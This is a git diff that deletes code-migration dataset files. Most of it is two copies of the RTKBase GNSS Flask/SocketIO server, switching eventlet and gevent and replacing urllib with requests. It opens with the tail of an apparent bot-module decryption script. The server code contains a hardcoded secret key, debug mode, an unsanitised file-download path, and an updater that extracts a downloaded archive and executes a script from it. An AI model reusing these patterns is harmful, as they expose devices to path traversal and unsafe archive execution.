key') - return - - for entry in os.listdir(args.directory): - path = os.path.join(args.directory, entry) - if not os.path.isdir(path): - continue - if os.path.samefile(path, args.dumpdir): - continue - - try: - numfiles += decrypt_modules(bot_key, path, args.dumpdir) - break - except FileNotFoundError: - continue - - if numfiles > 0: - log.info('[+] Saved %d decrypted file(s) to: %r', numfiles, args.dumpdir) - else: - log.error('[!] ERROR: Failed to decrypt any files') - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.diff b/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.diff deleted file mode 100644 index 307a147..0000000 --- a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.diff +++ /dev/null @@ -1,19 +0,0 @@ -diff --git a/web_app/server.py b/web_app/server.py - index 6ad29b4c76efe010320662d0dc360ca62b583366..a4c347a2ede5fba1d0e787193b7dc4079ab4fd6f 100644 - --- a/web_app/server.py - +++ b/web_app/server.py -@@ -23,10 +23,10 @@ - # You should have received a copy of the GNU General Public License - # along with ReachView. If not, see . 
- --#from gevent import monkey --#monkey.patch_all() --import eventlet --eventlet.monkey_patch() -+from gevent import monkey -+monkey.patch_all() -+#import eventlet -+#eventlet.monkey_patch() - - import time - import json diff --git a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.source.py b/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.source.py deleted file mode 100644 index 1ca5253..0000000 --- a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.source.py +++ /dev/null @@ -1,463 +0,0 @@ -#!/usr/bin/python - -# ReachView code is placed under the GPL license. -# Written by Egor Fedorov (egor.fedorov@emlid.com) -# Copyright (c) 2015, Emlid Limited -# All rights reserved. - -# If you are interested in using ReachView code as a part of a -# closed source project, please contact Emlid Limited (info@emlid.com). - -# This file is part of ReachView. - -# ReachView is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. - -# ReachView is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. - -# You should have received a copy of the GNU General Public License -# along with ReachView. If not, see . - -#from gevent import monkey -#monkey.patch_all() -import eventlet -eventlet.monkey_patch() - -import time -import json -import os -import signal -import sys -import urllib - -from threading import Thread -from RTKLIB import RTKLIB -from port import changeBaudrateTo115200 -from reach_tools import reach_tools, provisioner -from ServiceController import ServiceController -from RTKBaseConfigManager import RTKBaseConfigManager - -#print("Installing all required packages") -#provisioner.provision_reach() - -#import reach_bluetooth.bluetoothctl -#import reach_bluetooth.tcp_bridge - -from threading import Thread -from flask_bootstrap import Bootstrap -from flask import Flask, render_template, session, request, flash, url_for -from flask import send_file, send_from_directory, safe_join, redirect, abort -from flask_wtf import FlaskForm -from wtforms import PasswordField, BooleanField, SubmitField -from flask_login import LoginManager, login_user, logout_user, login_required, current_user, UserMixin -from wtforms.validators import ValidationError, DataRequired, EqualTo -from flask_socketio import SocketIO, emit, disconnect -from subprocess import check_output - -from werkzeug.security import generate_password_hash -from werkzeug.security import check_password_hash -from werkzeug.urls import url_parse - -app = Flask(__name__) -#app.template_folder = "." -app.debug = True -app.config["SECRET_KEY"] = "secret!" 
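The hunk above swaps the server's monkey patching from eventlet to gevent. Both libraries rewrite the standard library in place at import time, so the migration is confined to the first executable lines of the module; a minimal sketch of the two equivalent forms, assuming the respective package is installed:

# gevent flavour (what this commit switches to); must run before anything
# else imports the standard-library modules being patched.
from gevent import monkey
monkey.patch_all()

# eventlet flavour (what it replaces) would instead be:
#   import eventlet
#   eventlet.monkey_patch()

import socket  # from here on, socket and friends are the cooperative versions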
-#TODO take theses paths from settings.conf -app.config["UPLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../logs") -app.config["DOWNLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../data") -app.config["LOGIN_DISABLED"] = False - -#path_to_gnss_log = os.path.join(os.path.dirname(os.path.realpath(__file__)), "logs") -#path_to_gnss_log = "/home/stephane/gnss_venv/rtkbase/data/" -#path_to_rtklib = os.path.join(os.path.expanduser("~"), "gnss_venv/RTKLIB") -path_to_rtklib = "/usr/local/bin" - -login=LoginManager(app) -login.login_view = 'login_page' -socketio = SocketIO(app) -bootstrap = Bootstrap(app) - -rtk = RTKLIB(socketio, rtklib_path=path_to_rtklib, log_path=app.config["DOWNLOAD_FOLDER"]) -services_list = [{"service_unit" : "str2str_tcp.service", "name" : "main"}, - {"service_unit" : "str2str_ntrip.service", "name" : "ntrip"}, - {"service_unit" : "str2str_file.service", "name" : "file"},] - - -#Delay before rtkrcv will stop if no user is on status.html page -rtkcv_standby_delay = 600 - -rtkbaseconfig = RTKBaseConfigManager(os.path.join(os.path.dirname(__file__), "../settings.conf.default"), os.path.join(os.path.dirname(__file__), "../settings.conf")) - -class User(UserMixin): - def __init__(self, username): - self.id=username - self.password_hash = rtkbaseconfig.get("general", "web_password_hash") - - def check_password(self, password): - return check_password_hash(self.password_hash, password) - -class LoginForm(FlaskForm): - #username = StringField('Username', validators=[DataRequired()]) - password = PasswordField('Please enter the password:', validators=[DataRequired()]) - remember_me = BooleanField('Remember Me') - submit = SubmitField('Sign In') - -def update_password(config_object): - """ - Check in settings.conf if web_password entry contains a value - If yes, this function will generate a new hash for it and - remove the web_password value - :param config_object: a RTKBaseConfigManager instance - """ - new_password = config_object.get("general", "web_password") - if new_password is not "": - config_object.update_setting("general", "web_password_hash", generate_password_hash(new_password)) - config_object.update_setting("general", "web_password", "") - -def manager(): - - while True: - if rtk.sleep_count > rtkcv_standby_delay and rtk.state is not "inactive": - rtk.stopBase() - rtk.sleep_count = 0 - elif rtk.sleep_count > 10: - print("Je voudrais bien arrêter, mais rtk.state est : ", rtk.state) - time.sleep(1) - -@socketio.on("check update", namespace="/test") -def check_update(source_url = None, current_release = None, prerelease=False): - """ - check if an update exists - """ - new_release = None - source_url = source_url if source_url is not None else "https://api.github.com/repos/stefal/rtkbase/releases" - current_release = current_release if current_release is not None else rtkbaseconfig.get("general", "version").strip("v").strip('alpha').strip('beta') - - try: - response = urllib.request.urlopen(source_url) - response = json.loads(response.read()) - for release in response: - if release.get("prerelease") == prerelease: - latest_release = release["tag_name"].strip("v").strip('alpha').strip('beta') - if latest_release > current_release: - new_release = {"new_release" : latest_release, "url" : release.get("tarball_url")} - break - - except Exception as e: - print("Check update error: ", e) - new_release = None - socketio.emit("new release", new_release, namespace="/test") - return new_release - -@socketio.on("update rtkbase", namespace="/test") -def 
update_rtkbase(): - """ - download and update rtkbase - """ - #Check if an update is available - update_url = check_update().get("url") - if update_url is None: - return - - import tarfile - #Download update - update_archive = "/var/tmp/rtkbase_update.tar.gz" - response = urllib.request.urlopen(update_url) - with open(update_archive, "wb") as f: - for chunk in response: - f.write(chunk) - - #Get the "root" folder in the archive - tar = tarfile.open(update_archive) - for tarinfo in tar: - if tarinfo.isdir(): - primary_folder = tarinfo.name - break - - #Extract archive - tar.extractall("/var/tmp") - - #launch update script - rtk.shutdownBase() - rtkbase_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../")) - script_path = os.path.join("/var/tmp/", primary_folder, "rtkbase_update.sh") - os.execl(script_path, rtkbase_path, app.config["DOWNLOAD_FOLDER"].split("/")[-1]) - -# at this point we are ready to start rtk in 2 possible ways: rover and base -# we choose what to do by getting messages from the browser - -#@app.route("/") -#def index(): -# rtk.logm.updateAvailableLogs() -# return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) - -""" -def index(): - #if not session.get('logged_in'): - # return render_template('login.html') - #else: - rtk.logm.updateAvailableLogs() - return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) -""" -@login.user_loader -def load_user(id): - return User(id) - -@app.route('/') -@app.route('/index') -@app.route('/status') -@login_required -def status_page(): - return render_template("status.html") - -@app.route('/settings') -@login_required -def settings_page(): - data = rtkbaseconfig.get_ordered_settings() - return render_template("settings.html", data = data) - -@app.route('/logs') -@login_required -def logs_page(): - return render_template("logs.html") - -@app.route("/logs/download/") -@login_required -def downloadLog(log_name): - try: - full_log_path = rtk.logm.log_path + "/" + log_name - return send_file(full_log_path, as_attachment = True) - except FileNotFoundError: - abort(404) - -""" -@app.route("/logs/download/") -def downloadLog(log_name): - try: - return send_from_directory(app.config["DOWNLOAD_FOLDER"], filename=log_name, as_attachment=True) - except FileNotFoundError: - abort(404) -""" -@app.route('/login', methods=['GET', 'POST']) -def login_page(): - if current_user.is_authenticated: - return redirect(url_for('status_page')) - loginform = LoginForm() - if loginform.validate_on_submit(): - user = User('admin') - password = loginform.password.data - if not user.check_password(password): - return abort(401) - - login_user(user, remember=loginform.remember_me.data) - next_page = request.args.get('next') - if not next_page or url_parse(next_page).netloc != '': - next_page = url_for('status_page') - - return redirect(next_page) - - return render_template('login.html', title='Sign In', form=loginform) - -@app.route('/logout') -def logout(): - logout_user() - return redirect(url_for('login_page')) - -#### Handle connect/disconnect events #### - -@socketio.on("connect", namespace="/test") -def testConnect(): - print("Browser client connected") - rtk.sendState() - -@socketio.on("disconnect", namespace="/test") -def testDisconnect(): - print("Browser client disconnected") - -#### Log list handling ### - -@socketio.on("get logs list", namespace="/test") -def getAvailableLogs(): - print("DEBUG updating logs") - 
rtk.logm.updateAvailableLogs() - print("Updated logs list is " + str(rtk.logm.available_logs)) - rtk.socketio.emit("available logs", rtk.logm.available_logs, namespace="/test") - -#### str2str launch/shutdown handling #### - -@socketio.on("launch base", namespace="/test") -def launchBase(): - rtk.launchBase() - -@socketio.on("shutdown base", namespace="/test") -def shutdownBase(): - rtk.shutdownBase() - -#### str2str start/stop handling #### - -@socketio.on("start base", namespace="/test") -def startBase(): - rtk.startBase() - -@socketio.on("stop base", namespace="/test") -def stopBase(): - rtk.stopBase() - -@socketio.on("on graph", namespace="/test") -def continueBase(): - rtk.sleep_count = 0 -#### Free space handler - -@socketio.on("get available space", namespace="/test") -def getAvailableSpace(): - rtk.socketio.emit("available space", reach_tools.getFreeSpace(path_to_gnss_log), namespace="/test") - -#### Delete log button handler #### - -@socketio.on("delete log", namespace="/test") -def deleteLog(json): - rtk.logm.deleteLog(json.get("name")) - # Sending the the new available logs - getAvailableLogs() - -#### Download and convert log handlers #### - -@socketio.on("process log", namespace="/test") -def processLog(json): - log_name = json.get("name") - - print("Got signal to process a log, name = " + str(log_name)) - print("Path to log == " + rtk.logm.log_path + "/" + str(log_name)) - - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.processLogPackage(raw_log_path) - -@socketio.on("cancel log conversion", namespace="/test") -def cancelLogConversion(json): - log_name = json.get("name") - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.cancelLogConversion(raw_log_path) - -#### RINEX versioning #### - -@socketio.on("read RINEX version", namespace="/test") -def readRINEXVersion(): - rinex_version = rtk.logm.getRINEXVersion() - rtk.socketio.emit("current RINEX version", {"version": rinex_version}, namespace="/test") - -@socketio.on("write RINEX version", namespace="/test") -def writeRINEXVersion(json): - rinex_version = json.get("version") - rtk.logm.setRINEXVersion(rinex_version) - -#### Update ReachView #### - -@socketio.on("update reachview", namespace="/test") -def updateReachView(): - print("Got signal to update!!!") - print("Server interrupted by user to update!!") -# rtk.shutdown() -# bluetooth_bridge.stop() -# socketio.server.stop() -# os.execl("/home/reach/update.sh", "", str(os.getpid())) - -#### Device hardware functions #### - -@socketio.on("reboot device", namespace="/test") -def rebootRtkbase(): - print("Rebooting...") - rtk.shutdown() - socketio.stop() - check_output("reboot") - -@socketio.on("shutdown device", namespace="/test") -def shutdownRtkbase(): - print("Shutdown...") - rtk.shutdown() - socketio.stop() - check_output(["shutdown", "now"]) - -@socketio.on("turn off wi-fi", namespace="/test") -def turnOffWiFi(): - print("Turning off wi-fi") -# check_output("rfkill block wlan", shell = True) - -#### Systemd Services functions #### - -def load_units(services): - #load unit service before getting status - for service in services: - service["unit"] = ServiceController(service["service_unit"]) - return services - - -@socketio.on("get services status", namespace="/test") -def getServicesStatus(): - print("Getting services status") - - for service in services_list: - service["active"] = service["unit"].isActive() - - services_status = [] - for service in services_list: - services_status.append({key:service[key] for key in service if key != 'unit'}) - - 
print(services_status) - socketio.emit("services status", json.dumps(services_status), namespace="/test") - -@socketio.on("services switch", namespace="/test") -def switchService(json): - print("Received service to switch", json) - try: - for service in services_list: - if json["name"] == service["name"] and json["active"] == True: - print("Trying to start service {}".format(service["name"])) - service["unit"].start() - elif json["name"] == service["name"] and json["active"] == False: - print("Trying to stop service {}".format(service["name"])) - service["unit"].stop() - - except Exception as e: - print(e) - finally: - time.sleep(3) - getServicesStatus() - -if __name__ == "__main__": - try: - #check if a new password is defined in settings.conf - update_password(rtkbaseconfig) - #check if authentification is required - if not rtkbaseconfig.get_web_authentification(): - app.config["LOGIN_DISABLED"] = True - #load services status managed with systemd - services_list = load_units(services_list) - #Start a "manager" thread - manager_thread = Thread(target=manager, daemon=True) - manager_thread.start() - - app.secret_key = os.urandom(12) - socketio.run(app, host = "0.0.0.0", port = 8080) - - except KeyboardInterrupt: - print("Server interrupted by user!!") - - # clean up broadcast and blink threads - rtk.server_not_interrupted = False -# rtk.led.blinker_not_interrupted = False - rtk.waiting_for_single = False - - if rtk.coordinate_thread is not None: - rtk.coordinate_thread.join() - - if rtk.satellite_thread is not None: - rtk.satellite_thread.join() - -# if rtk.led.blinker_thread is not None: -# rtk.led.blinker_thread.join() - diff --git a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.target.py b/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.target.py deleted file mode 100644 index 6323cf8..0000000 --- a/v1/data/codefile/stefal@rtkbase__a4c347a__web_app$server.py.target.py +++ /dev/null @@ -1,463 +0,0 @@ -#!/usr/bin/python - -# ReachView code is placed under the GPL license. -# Written by Egor Fedorov (egor.fedorov@emlid.com) -# Copyright (c) 2015, Emlid Limited -# All rights reserved. - -# If you are interested in using ReachView code as a part of a -# closed source project, please contact Emlid Limited (info@emlid.com). - -# This file is part of ReachView. - -# ReachView is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. - -# ReachView is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. - -# You should have received a copy of the GNU General Public License -# along with ReachView. If not, see . 
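A practical consequence of the eventlet/gevent swap is the async mode Flask-SocketIO runs under. A minimal sketch, assuming flask_socketio is installed; passing async_mode explicitly is optional, since the library auto-detects whichever supported worker package is importable:

from flask import Flask
from flask_socketio import SocketIO

app = Flask(__name__)
socketio = SocketIO(app, async_mode="gevent")  # or omit async_mode to auto-detect
print(socketio.async_mode)                     # reports which worker was picked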
- -from gevent import monkey -monkey.patch_all() -#import eventlet -#eventlet.monkey_patch() - -import time -import json -import os -import signal -import sys -import urllib - -from threading import Thread -from RTKLIB import RTKLIB -from port import changeBaudrateTo115200 -from reach_tools import reach_tools, provisioner -from ServiceController import ServiceController -from RTKBaseConfigManager import RTKBaseConfigManager - -#print("Installing all required packages") -#provisioner.provision_reach() - -#import reach_bluetooth.bluetoothctl -#import reach_bluetooth.tcp_bridge - -from threading import Thread -from flask_bootstrap import Bootstrap -from flask import Flask, render_template, session, request, flash, url_for -from flask import send_file, send_from_directory, safe_join, redirect, abort -from flask_wtf import FlaskForm -from wtforms import PasswordField, BooleanField, SubmitField -from flask_login import LoginManager, login_user, logout_user, login_required, current_user, UserMixin -from wtforms.validators import ValidationError, DataRequired, EqualTo -from flask_socketio import SocketIO, emit, disconnect -from subprocess import check_output - -from werkzeug.security import generate_password_hash -from werkzeug.security import check_password_hash -from werkzeug.urls import url_parse - -app = Flask(__name__) -#app.template_folder = "." -app.debug = True -app.config["SECRET_KEY"] = "secret!" -#TODO take theses paths from settings.conf -app.config["UPLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../logs") -app.config["DOWNLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../data") -app.config["LOGIN_DISABLED"] = False - -#path_to_gnss_log = os.path.join(os.path.dirname(os.path.realpath(__file__)), "logs") -#path_to_gnss_log = "/home/stephane/gnss_venv/rtkbase/data/" -#path_to_rtklib = os.path.join(os.path.expanduser("~"), "gnss_venv/RTKLIB") -path_to_rtklib = "/usr/local/bin" - -login=LoginManager(app) -login.login_view = 'login_page' -socketio = SocketIO(app) -bootstrap = Bootstrap(app) - -rtk = RTKLIB(socketio, rtklib_path=path_to_rtklib, log_path=app.config["DOWNLOAD_FOLDER"]) -services_list = [{"service_unit" : "str2str_tcp.service", "name" : "main"}, - {"service_unit" : "str2str_ntrip.service", "name" : "ntrip"}, - {"service_unit" : "str2str_file.service", "name" : "file"},] - - -#Delay before rtkrcv will stop if no user is on status.html page -rtkcv_standby_delay = 600 - -rtkbaseconfig = RTKBaseConfigManager(os.path.join(os.path.dirname(__file__), "../settings.conf.default"), os.path.join(os.path.dirname(__file__), "../settings.conf")) - -class User(UserMixin): - def __init__(self, username): - self.id=username - self.password_hash = rtkbaseconfig.get("general", "web_password_hash") - - def check_password(self, password): - return check_password_hash(self.password_hash, password) - -class LoginForm(FlaskForm): - #username = StringField('Username', validators=[DataRequired()]) - password = PasswordField('Please enter the password:', validators=[DataRequired()]) - remember_me = BooleanField('Remember Me') - submit = SubmitField('Sign In') - -def update_password(config_object): - """ - Check in settings.conf if web_password entry contains a value - If yes, this function will generate a new hash for it and - remove the web_password value - :param config_object: a RTKBaseConfigManager instance - """ - new_password = config_object.get("general", "web_password") - if new_password is not "": - config_object.update_setting("general", "web_password_hash", 
generate_password_hash(new_password)) - config_object.update_setting("general", "web_password", "") - -def manager(): - - while True: - if rtk.sleep_count > rtkcv_standby_delay and rtk.state is not "inactive": - rtk.stopBase() - rtk.sleep_count = 0 - elif rtk.sleep_count > 10: - print("Je voudrais bien arrêter, mais rtk.state est : ", rtk.state) - time.sleep(1) - -@socketio.on("check update", namespace="/test") -def check_update(source_url = None, current_release = None, prerelease=False): - """ - check if an update exists - """ - new_release = None - source_url = source_url if source_url is not None else "https://api.github.com/repos/stefal/rtkbase/releases" - current_release = current_release if current_release is not None else rtkbaseconfig.get("general", "version").strip("v").strip('alpha').strip('beta') - - try: - response = urllib.request.urlopen(source_url) - response = json.loads(response.read()) - for release in response: - if release.get("prerelease") == prerelease: - latest_release = release["tag_name"].strip("v").strip('alpha').strip('beta') - if latest_release > current_release: - new_release = {"new_release" : latest_release, "url" : release.get("tarball_url")} - break - - except Exception as e: - print("Check update error: ", e) - new_release = None - socketio.emit("new release", new_release, namespace="/test") - return new_release - -@socketio.on("update rtkbase", namespace="/test") -def update_rtkbase(): - """ - download and update rtkbase - """ - #Check if an update is available - update_url = check_update().get("url") - if update_url is None: - return - - import tarfile - #Download update - update_archive = "/var/tmp/rtkbase_update.tar.gz" - response = urllib.request.urlopen(update_url) - with open(update_archive, "wb") as f: - for chunk in response: - f.write(chunk) - - #Get the "root" folder in the archive - tar = tarfile.open(update_archive) - for tarinfo in tar: - if tarinfo.isdir(): - primary_folder = tarinfo.name - break - - #Extract archive - tar.extractall("/var/tmp") - - #launch update script - rtk.shutdownBase() - rtkbase_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../")) - script_path = os.path.join("/var/tmp/", primary_folder, "rtkbase_update.sh") - os.execl(script_path, rtkbase_path, app.config["DOWNLOAD_FOLDER"].split("/")[-1]) - -# at this point we are ready to start rtk in 2 possible ways: rover and base -# we choose what to do by getting messages from the browser - -#@app.route("/") -#def index(): -# rtk.logm.updateAvailableLogs() -# return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) - -""" -def index(): - #if not session.get('logged_in'): - # return render_template('login.html') - #else: - rtk.logm.updateAvailableLogs() - return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) -""" -@login.user_loader -def load_user(id): - return User(id) - -@app.route('/') -@app.route('/index') -@app.route('/status') -@login_required -def status_page(): - return render_template("status.html") - -@app.route('/settings') -@login_required -def settings_page(): - data = rtkbaseconfig.get_ordered_settings() - return render_template("settings.html", data = data) - -@app.route('/logs') -@login_required -def logs_page(): - return render_template("logs.html") - -@app.route("/logs/download/") -@login_required -def downloadLog(log_name): - try: - full_log_path = rtk.logm.log_path + "/" + log_name - return send_file(full_log_path, 
as_attachment = True) - except FileNotFoundError: - abort(404) - -""" -@app.route("/logs/download/") -def downloadLog(log_name): - try: - return send_from_directory(app.config["DOWNLOAD_FOLDER"], filename=log_name, as_attachment=True) - except FileNotFoundError: - abort(404) -""" -@app.route('/login', methods=['GET', 'POST']) -def login_page(): - if current_user.is_authenticated: - return redirect(url_for('status_page')) - loginform = LoginForm() - if loginform.validate_on_submit(): - user = User('admin') - password = loginform.password.data - if not user.check_password(password): - return abort(401) - - login_user(user, remember=loginform.remember_me.data) - next_page = request.args.get('next') - if not next_page or url_parse(next_page).netloc != '': - next_page = url_for('status_page') - - return redirect(next_page) - - return render_template('login.html', title='Sign In', form=loginform) - -@app.route('/logout') -def logout(): - logout_user() - return redirect(url_for('login_page')) - -#### Handle connect/disconnect events #### - -@socketio.on("connect", namespace="/test") -def testConnect(): - print("Browser client connected") - rtk.sendState() - -@socketio.on("disconnect", namespace="/test") -def testDisconnect(): - print("Browser client disconnected") - -#### Log list handling ### - -@socketio.on("get logs list", namespace="/test") -def getAvailableLogs(): - print("DEBUG updating logs") - rtk.logm.updateAvailableLogs() - print("Updated logs list is " + str(rtk.logm.available_logs)) - rtk.socketio.emit("available logs", rtk.logm.available_logs, namespace="/test") - -#### str2str launch/shutdown handling #### - -@socketio.on("launch base", namespace="/test") -def launchBase(): - rtk.launchBase() - -@socketio.on("shutdown base", namespace="/test") -def shutdownBase(): - rtk.shutdownBase() - -#### str2str start/stop handling #### - -@socketio.on("start base", namespace="/test") -def startBase(): - rtk.startBase() - -@socketio.on("stop base", namespace="/test") -def stopBase(): - rtk.stopBase() - -@socketio.on("on graph", namespace="/test") -def continueBase(): - rtk.sleep_count = 0 -#### Free space handler - -@socketio.on("get available space", namespace="/test") -def getAvailableSpace(): - rtk.socketio.emit("available space", reach_tools.getFreeSpace(path_to_gnss_log), namespace="/test") - -#### Delete log button handler #### - -@socketio.on("delete log", namespace="/test") -def deleteLog(json): - rtk.logm.deleteLog(json.get("name")) - # Sending the the new available logs - getAvailableLogs() - -#### Download and convert log handlers #### - -@socketio.on("process log", namespace="/test") -def processLog(json): - log_name = json.get("name") - - print("Got signal to process a log, name = " + str(log_name)) - print("Path to log == " + rtk.logm.log_path + "/" + str(log_name)) - - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.processLogPackage(raw_log_path) - -@socketio.on("cancel log conversion", namespace="/test") -def cancelLogConversion(json): - log_name = json.get("name") - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.cancelLogConversion(raw_log_path) - -#### RINEX versioning #### - -@socketio.on("read RINEX version", namespace="/test") -def readRINEXVersion(): - rinex_version = rtk.logm.getRINEXVersion() - rtk.socketio.emit("current RINEX version", {"version": rinex_version}, namespace="/test") - -@socketio.on("write RINEX version", namespace="/test") -def writeRINEXVersion(json): - rinex_version = json.get("version") - rtk.logm.setRINEXVersion(rinex_version) - 
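One detail worth flagging in the check_update handler above: it compares release tags as plain strings, which works for single-digit components but would misorder multi-digit ones ("2.10" sorts below "2.9"). A sketch of a tuple-based comparison; version_key is a hypothetical helper, not part of the original code:

def version_key(tag: str):
    # "2.10" -> (2, 10), so numeric components compare numerically
    return tuple(int(part) for part in tag.split(".") if part.isdigit())

assert version_key("2.10") > version_key("2.9")
assert "2.10" < "2.9"  # the plain string comparison gets this backwards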
-#### Update ReachView #### - -@socketio.on("update reachview", namespace="/test") -def updateReachView(): - print("Got signal to update!!!") - print("Server interrupted by user to update!!") -# rtk.shutdown() -# bluetooth_bridge.stop() -# socketio.server.stop() -# os.execl("/home/reach/update.sh", "", str(os.getpid())) - -#### Device hardware functions #### - -@socketio.on("reboot device", namespace="/test") -def rebootRtkbase(): - print("Rebooting...") - rtk.shutdown() - socketio.stop() - check_output("reboot") - -@socketio.on("shutdown device", namespace="/test") -def shutdownRtkbase(): - print("Shutdown...") - rtk.shutdown() - socketio.stop() - check_output(["shutdown", "now"]) - -@socketio.on("turn off wi-fi", namespace="/test") -def turnOffWiFi(): - print("Turning off wi-fi") -# check_output("rfkill block wlan", shell = True) - -#### Systemd Services functions #### - -def load_units(services): - #load unit service before getting status - for service in services: - service["unit"] = ServiceController(service["service_unit"]) - return services - - -@socketio.on("get services status", namespace="/test") -def getServicesStatus(): - print("Getting services status") - - for service in services_list: - service["active"] = service["unit"].isActive() - - services_status = [] - for service in services_list: - services_status.append({key:service[key] for key in service if key != 'unit'}) - - print(services_status) - socketio.emit("services status", json.dumps(services_status), namespace="/test") - -@socketio.on("services switch", namespace="/test") -def switchService(json): - print("Received service to switch", json) - try: - for service in services_list: - if json["name"] == service["name"] and json["active"] == True: - print("Trying to start service {}".format(service["name"])) - service["unit"].start() - elif json["name"] == service["name"] and json["active"] == False: - print("Trying to stop service {}".format(service["name"])) - service["unit"].stop() - - except Exception as e: - print(e) - finally: - time.sleep(3) - getServicesStatus() - -if __name__ == "__main__": - try: - #check if a new password is defined in settings.conf - update_password(rtkbaseconfig) - #check if authentification is required - if not rtkbaseconfig.get_web_authentification(): - app.config["LOGIN_DISABLED"] = True - #load services status managed with systemd - services_list = load_units(services_list) - #Start a "manager" thread - manager_thread = Thread(target=manager, daemon=True) - manager_thread.start() - - app.secret_key = os.urandom(12) - socketio.run(app, host = "0.0.0.0", port = 8080) - - except KeyboardInterrupt: - print("Server interrupted by user!!") - - # clean up broadcast and blink threads - rtk.server_not_interrupted = False -# rtk.led.blinker_not_interrupted = False - rtk.waiting_for_single = False - - if rtk.coordinate_thread is not None: - rtk.coordinate_thread.join() - - if rtk.satellite_thread is not None: - rtk.satellite_thread.join() - -# if rtk.led.blinker_thread is not None: -# rtk.led.blinker_thread.join() - diff --git a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.diff b/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.diff deleted file mode 100644 index 0dfc46f..0000000 --- a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.diff +++ /dev/null @@ -1,55 +0,0 @@ -diff --git a/web_app/server.py b/web_app/server.py - index 16393d382e381c7ad49ef92451505a7418489e82..cf856c0cc9cbb0f810d59c9419f8789a1f9f5a80 100644 - --- a/web_app/server.py - +++ 
b/web_app/server.py -@@ -23,17 +23,17 @@ - # You should have received a copy of the GNU General Public License - # along with ReachView. If not, see . - --from gevent import monkey --monkey.patch_all() --#import eventlet --#eventlet.monkey_patch() -+#from gevent import monkey -+#monkey.patch_all() -+import eventlet -+eventlet.monkey_patch() - - import time - import json - import os - import signal - import sys --import urllib -+import requests - - from threading import Thread - from RTKLIB import RTKLIB -@@ -140,8 +140,8 @@ def check_update(source_url = None, current_release = None, prerelease=True, emi - current_release = current_release if current_release is not None else rtkbaseconfig.get("general", "version").strip("v").strip('alpha').strip('beta') - - try: -- response = urllib.request.urlopen(source_url) -- response = json.loads(response.read()) -+ response = requests.get(source_url) -+ response = response.json() - for release in response: - if release.get("prerelease") == prerelease: - latest_release = release["tag_name"].strip("v").strip('alpha').strip('beta') -@@ -170,10 +170,12 @@ def update_rtkbase(): - import tarfile - #Download update - update_archive = "/var/tmp/rtkbase_update.tar.gz" -- response = urllib.request.urlopen(update_url) -- with open(update_archive, "wb") as f: -- for chunk in response: -- f.write(chunk) -+ try: -+ response = requests.get(update_url) -+ with open(update_archive, "wb") as f: -+ f.write(response.content) -+ except Exception as e: -+ print("Error: Can't download update - ", e) - - #Get the "root" folder in the archive - tar = tarfile.open(update_archive) diff --git a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.source.py b/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.source.py deleted file mode 100644 index 5ca7616..0000000 --- a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.source.py +++ /dev/null @@ -1,471 +0,0 @@ -#!/usr/bin/python - -# ReachView code is placed under the GPL license. -# Written by Egor Fedorov (egor.fedorov@emlid.com) -# Copyright (c) 2015, Emlid Limited -# All rights reserved. - -# If you are interested in using ReachView code as a part of a -# closed source project, please contact Emlid Limited (info@emlid.com). - -# This file is part of ReachView. - -# ReachView is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. - -# ReachView is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. - -# You should have received a copy of the GNU General Public License -# along with ReachView. If not, see . 
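The hunk above is a urllib-to-requests migration: json.loads(urllib.request.urlopen(url).read()) collapses to requests.get(url).json(), and the chunked tarball copy becomes a single write of response.content. A minimal sketch, assuming requests is installed; the URL and output path are taken from the diff itself:

import requests

releases = requests.get("https://api.github.com/repos/stefal/rtkbase/releases").json()

tarball_url = releases[0].get("tarball_url") if releases else None
if tarball_url:
    with open("/var/tmp/rtkbase_update.tar.gz", "wb") as f:
        f.write(requests.get(tarball_url).content)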
